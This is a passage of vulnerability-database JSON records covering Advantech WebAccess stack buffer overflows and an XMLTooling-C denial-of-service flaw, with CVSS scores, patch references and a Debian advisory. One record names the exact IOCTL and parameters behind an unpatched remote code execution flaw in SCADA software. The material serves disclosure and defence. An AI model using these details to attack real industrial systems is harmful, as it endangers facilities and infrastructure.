}, { "db": "ZDI_CAN", "id": "ZDI-CAN-5048", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-047", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5043", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-042", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5061", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-058", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5063", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-060", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5055", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-054", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5050", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-049", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5042", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-041", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4991", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-023", "trust": 0.7 }, { "db": "IVD", "id": "E2E0E08F-39AB-11E9-B1D1-000C29342CB1", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "e2e0e08f-39ab-11e9-b1d1-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-044" }, { "db": "ZDI", "id": "ZDI-18-050" }, { "db": "ZDI", "id": "ZDI-18-053" }, { "db": "ZDI", "id": "ZDI-18-061" }, { "db": "ZDI", "id": "ZDI-18-025" }, { "db": "ZDI", "id": "ZDI-18-047" }, { "db": "ZDI", "id": "ZDI-18-042" }, { "db": "ZDI", "id": "ZDI-18-058" }, { "db": "ZDI", "id": "ZDI-18-060" }, { "db": "ZDI", "id": "ZDI-18-054" }, { "db": "ZDI", "id": "ZDI-18-049" }, { "db": "ZDI", "id": "ZDI-18-041" }, { "db": "ZDI", "id": "ZDI-18-023" }, { "db": "CNVD", "id": "CNVD-2018-00671" }, { "db": "BID", "id": "102424" }, { "db": "CNNVD", "id": "CNNVD-201801-242" }, { "db": "NVD", "id": "CVE-2017-16724" } ] }, "id": "VAR-201801-0151", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2e0e08f-39ab-11e9-b1d1-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00671" } ], "trust": 1.3972832733333334 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2e0e08f-39ab-11e9-b1d1-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00671" } ] }, "last_update_date": "2024-11-29T22:49:45.101000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 9.1, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02" }, { "title": "Patch for Advantech WebAccess Stack Buffer Overflow Vulnerability (CNVD-2018-00671)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/113123" }, { "title": "Advantech WebAccess Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=77553" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-044" }, { "db": "ZDI", "id": "ZDI-18-050" }, { "db": "ZDI", "id": "ZDI-18-053" }, { "db": "ZDI", "id": "ZDI-18-061" }, { "db": "ZDI", "id": "ZDI-18-025" }, { "db": "ZDI", "id": "ZDI-18-047" }, { "db": "ZDI", "id": "ZDI-18-042" }, { "db": "ZDI", "id": "ZDI-18-058" }, { "db": "ZDI", "id": "ZDI-18-060" }, { "db": "ZDI", "id": "ZDI-18-054" }, { "db": "ZDI", "id": "ZDI-18-049" }, { "db": "ZDI", "id": "ZDI-18-041" }, { "db": "ZDI", "id": "ZDI-18-023" }, { "db": "CNVD", "id": "CNVD-2018-00671" }, { "db": "CNNVD", "id": "CNNVD-201801-242" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-121", "trust": 1.0 }, { "problemtype": "CWE-119", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2017-16724" } ] }, "references": { "_id": null, "data": [ { "trust": 11.0, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-004-02" }, { "trust": 2.2, "url": "http://www.securityfocus.com/bid/102424" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-044" }, { "db": "ZDI", "id": "ZDI-18-050" }, { "db": "ZDI", "id": "ZDI-18-053" }, { "db": "ZDI", "id": "ZDI-18-061" }, { "db": "ZDI", "id": "ZDI-18-025" }, { "db": "ZDI", "id": "ZDI-18-047" }, { "db": "ZDI", "id": "ZDI-18-042" }, { "db": "ZDI", "id": "ZDI-18-058" }, { "db": "ZDI", "id": "ZDI-18-060" }, { "db": "ZDI", "id": "ZDI-18-054" }, { "db": "ZDI", "id": "ZDI-18-049" }, { "db": "ZDI", "id": "ZDI-18-041" }, { "db": "ZDI", "id": "ZDI-18-023" }, { "db": "CNVD", "id": "CNVD-2018-00671" }, { "db": "BID", "id": "102424" }, { "db": "CNNVD", "id": "CNNVD-201801-242" }, { "db": "NVD", "id": "CVE-2017-16724" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2e0e08f-39ab-11e9-b1d1-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-18-044", "ident": null }, { "db": "ZDI", "id": "ZDI-18-050", "ident": null }, { "db": "ZDI", "id": "ZDI-18-053", "ident": null }, { "db": "ZDI", "id": "ZDI-18-061", "ident": null }, { "db": "ZDI", "id": "ZDI-18-025", "ident": null }, { "db": "ZDI", "id": "ZDI-18-047", "ident": null }, { "db": "ZDI", "id": "ZDI-18-042", "ident": null }, { "db": "ZDI", "id": "ZDI-18-058", "ident": null }, { "db": "ZDI", "id": "ZDI-18-060", "ident": null }, { "db": "ZDI", "id": "ZDI-18-054", "ident": null }, { "db": "ZDI", "id": "ZDI-18-049", "ident": null }, { "db": "ZDI", "id": "ZDI-18-041", "ident": null }, { "db": "ZDI", "id": "ZDI-18-023", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-00671", "ident": null }, { "db": "BID", "id": "102424", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201801-242", "ident": null }, { "db": "NVD", "id": "CVE-2017-16724", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-01-10T00:00:00", "db": "IVD", "id": "e2e0e08f-39ab-11e9-b1d1-000c29342cb1", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-044", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-050", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-053", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-061", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-025", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-047", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-042", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-058", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-060", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-054", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-049", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-041", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-023", "ident": null }, { "date": "2018-01-10T00:00:00", "db": "CNVD", "id": "CNVD-2018-00671", "ident": null }, { "date": "2018-01-04T00:00:00", "db": "BID", "id": "102424", "ident": null }, { "date": "2018-01-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201801-242", "ident": null }, { "date": "2018-01-05T08:29:00.347000", "db": "NVD", "id": "CVE-2017-16724", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-044", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-050", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-053", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-061", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-025", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-047", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-042", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-058", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-060", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-054", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-049", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-041", "ident": null }, { "date": "2018-01-05T00:00:00", "db": "ZDI", "id": "ZDI-18-023", "ident": null }, { "date": "2018-01-10T00:00:00", "db": "CNVD", "id": "CNVD-2018-00671", "ident": null }, { "date": "2018-01-04T00:00:00", "db": "BID", "id": "102424", "ident": null }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201801-242", "ident": null }, { "date": "2024-11-21T03:16:51.453000", "db": "NVD", "id": "CVE-2017-16724", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201801-242" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess bwwfaa Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-18-044" } ], "trust": 0.7 }, "type": { "_id": null, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "e2e0e08f-39ab-11e9-b1d1-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201801-242" } ], "trust": 0.8 } }
var-201602-0472
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf using the ProjectName and NodeName parameters. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-146" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-146" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-146", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-146", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-146" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf using the ProjectName and NodeName parameters. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-146" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3155", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-146", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-146" } ] }, "id": "VAR-201602-0472", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:08:59.747000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-146" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-146" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-16-146", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-146", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-146", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll ProjectName/NodeName sprintf Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-146" } ], "trust": 0.7 } }
var-201508-0600
Vulnerability from variot
XMLTooling-C before 1.5.5, as used in OpenSAML-C and Shibboleth Service Provider (SP), does not properly handle integer conversion exceptions, which allows remote attackers to cause a denial of service (crash) via schema-invalid XML data. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. A security vulnerability exists in versions prior to Advantech WebAccess 8.1 that could be exploited by a remote attacker to cause a denial of service (out of bounds memory access). XMLTooling-C is prone to a denial-of-service vulnerability. Remote attackers can exploit this issue to cause the application using affected library to crash, denying service to legitimate users. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
Debian Security Advisory DSA-3321-1 security@debian.org https://www.debian.org/security/ Alessandro Ghedini July 30, 2015 https://www.debian.org/security/faq
Package : xmltooling CVE ID : CVE-2015-0851 Debian Bug : 793855
The InCommon Shibboleth Training team discovered that XMLTooling, a C++ XML parsing library, did not properly handle an exception when parsing well-formed but schema-invalid XML.
For the oldstable distribution (wheezy), this problem has been fixed in version 1.4.2-5+deb7u1.
For the stable distribution (jessie), this problem has been fixed in version 1.5.3-2+deb8u1.
For the unstable distribution (sid), this problem will be fixed shortly.
We recommend that you upgrade your xmltooling packages.
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIcBAEBCgAGBQJVuoLsAAoJEK+lG9bN5XPLpgUP/07/YpmqvpItmNLfLvnE5yRD lLBc5TgD1oOOcV9SWk8fMdwU+YQ/uWOaBOYWXLwmTgriSXZgLSTUVn3BhWp9o7AQ /7E0wCBGrRErx/cQ1FOrRXAaZhXPgimaL9+7RPs+wkruIUyjhzHcj+TR13CkdHIE GI6Ah1NwuMWmqADXZd+XM3nV7Lieg9JBoXxsn0ZSY/7/BwwZh/HSME81+JmEvmTW OL+knet01hwVH39XI7fGgnpfRqxqTNf1gqmAu4Q0lbHcVClLDYtZlPpUQ55/evks rNyFaN5QmzMhZiiAcy6yakVKKFx/fdrAKog9xtfTUicBmkxFREQfy+CjhY7GmY4o o1S4DcV52z5YC3emSHUyQxqlwrKUzJznfVzjCLb289kS7JaySuYRuPM64y33Wyom nqXFZfjzgPIjskBqdxrctabDIcTHy0Mk+97yyMC8R8Wkw/00pzhcu6AIhGczSkCO cyOGOvdaDKFSj0RDqgJWuFtuKiJVSaClMJZTYNJATlKXeHtVHFptSo5POQAFXOEt BBeMRlw+gYhykNIjZTewHhiv/R27bjGaoV1lIcc3MMo6vhbOGmp6rjnMfTUYLO85 eDiiGn406vBB/4C5vvfSBBLpdnm6cSLQHHfLXGpU7wdIh2O1YAIo24Qp6Y9Njo5p p0yQgYhONZ0+MuBclNES =Jzdd -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201508-0600", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "xmltooling", "scope": "lte", "trust": 1.0, "vendor": "xmltooling", "version": "1.5.4" }, { "model": "opensaml", "scope": "lt", "trust": 0.8, "vendor": "shibboleth", "version": "-c 2.5.5" }, { "model": "service provider", "scope": null, "trust": 0.8, "vendor": "shibboleth", "version": null }, { "model": "xmltooling", "scope": "lt", "trust": 0.8, "vendor": "shibboleth", "version": "-c 1.5.5" }, { "model": "webaccess", "scope": "lt", "trust": 0.6, "vendor": "advantech", "version": "8.1" }, { "model": "xmltooling", "scope": "eq", "trust": 0.6, "vendor": "xmltooling", "version": "1.5.4" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00428" }, { "db": "BID", "id": "76134" }, { "db": "JVNDB", "id": "JVNDB-2015-004047" }, { "db": "CNNVD", "id": "CNNVD-201508-095" }, { "db": "NVD", "id": "CVE-2015-0851" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:shibboleth:opensaml", "vulnerable": true }, { "cpe22Uri": "cpe:/a:shibboleth:shibboleth-sp", "vulnerable": true }, { "cpe22Uri": "cpe:/a:shibboleth:xmltooling", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-004047" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Scott Cantor", "sources": [ { "db": "BID", "id": "76134" } ], "trust": 0.3 }, "cve": "CVE-2015-0851", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2015-0851", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CNVD-2016-00428", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2015-0851", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2015-0851", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2016-00428", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201508-095", "trust": 0.6, "value": "MEDIUM" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00428" }, { "db": "JVNDB", "id": "JVNDB-2015-004047" }, { "db": "CNNVD", "id": "CNNVD-201508-095" }, { "db": "NVD", "id": "CVE-2015-0851" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "XMLTooling-C before 1.5.5, as used in OpenSAML-C and Shibboleth Service Provider (SP), does not properly handle integer conversion exceptions, which allows remote attackers to cause a denial of service (crash) via schema-invalid XML data. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. A security vulnerability exists in versions prior to Advantech WebAccess 8.1 that could be exploited by a remote attacker to cause a denial of service (out of bounds memory access). XMLTooling-C is prone to a denial-of-service vulnerability. \nRemote attackers can exploit this issue to cause the application using affected library to crash, denying service to legitimate users. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3321-1 security@debian.org\nhttps://www.debian.org/security/ Alessandro Ghedini\nJuly 30, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : xmltooling\nCVE ID : CVE-2015-0851\nDebian Bug : 793855\n\nThe InCommon Shibboleth Training team discovered that XMLTooling, a\nC++ XML parsing library, did not properly handle an exception when\nparsing well-formed but schema-invalid XML. \n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.4.2-5+deb7u1. \n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.5.3-2+deb8u1. \n\nFor the unstable distribution (sid), this problem will be fixed shortly. \n\nWe recommend that you upgrade your xmltooling packages. \n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIcBAEBCgAGBQJVuoLsAAoJEK+lG9bN5XPLpgUP/07/YpmqvpItmNLfLvnE5yRD\nlLBc5TgD1oOOcV9SWk8fMdwU+YQ/uWOaBOYWXLwmTgriSXZgLSTUVn3BhWp9o7AQ\n/7E0wCBGrRErx/cQ1FOrRXAaZhXPgimaL9+7RPs+wkruIUyjhzHcj+TR13CkdHIE\nGI6Ah1NwuMWmqADXZd+XM3nV7Lieg9JBoXxsn0ZSY/7/BwwZh/HSME81+JmEvmTW\nOL+knet01hwVH39XI7fGgnpfRqxqTNf1gqmAu4Q0lbHcVClLDYtZlPpUQ55/evks\nrNyFaN5QmzMhZiiAcy6yakVKKFx/fdrAKog9xtfTUicBmkxFREQfy+CjhY7GmY4o\no1S4DcV52z5YC3emSHUyQxqlwrKUzJznfVzjCLb289kS7JaySuYRuPM64y33Wyom\nnqXFZfjzgPIjskBqdxrctabDIcTHy0Mk+97yyMC8R8Wkw/00pzhcu6AIhGczSkCO\ncyOGOvdaDKFSj0RDqgJWuFtuKiJVSaClMJZTYNJATlKXeHtVHFptSo5POQAFXOEt\nBBeMRlw+gYhykNIjZTewHhiv/R27bjGaoV1lIcc3MMo6vhbOGmp6rjnMfTUYLO85\neDiiGn406vBB/4C5vvfSBBLpdnm6cSLQHHfLXGpU7wdIh2O1YAIo24Qp6Y9Njo5p\np0yQgYhONZ0+MuBclNES\n=Jzdd\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2015-0851" }, { "db": "JVNDB", "id": "JVNDB-2015-004047" }, { "db": "CNVD", "id": "CNVD-2016-00428" }, { "db": "BID", "id": "76134" }, { "db": "PACKETSTORM", "id": "132904" } ], "trust": 2.52 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-0851", "trust": 3.4 }, { "db": "BID", "id": "76134", "trust": 1.3 }, { "db": "JVNDB", "id": "JVNDB-2015-004047", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2016-00428", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201508-095", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "132904", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00428" }, { "db": "BID", "id": "76134" }, { "db": "JVNDB", "id": "JVNDB-2015-004047" }, { "db": "PACKETSTORM", "id": "132904" }, { "db": "CNNVD", "id": "CNNVD-201508-095" }, { "db": "NVD", "id": "CVE-2015-0851" } ] }, "id": "VAR-201508-0600", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2016-00428" } ], "trust": 1.0347069599999998 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00428" } ] }, "last_update_date": "2024-11-23T21:43:23.365000Z", 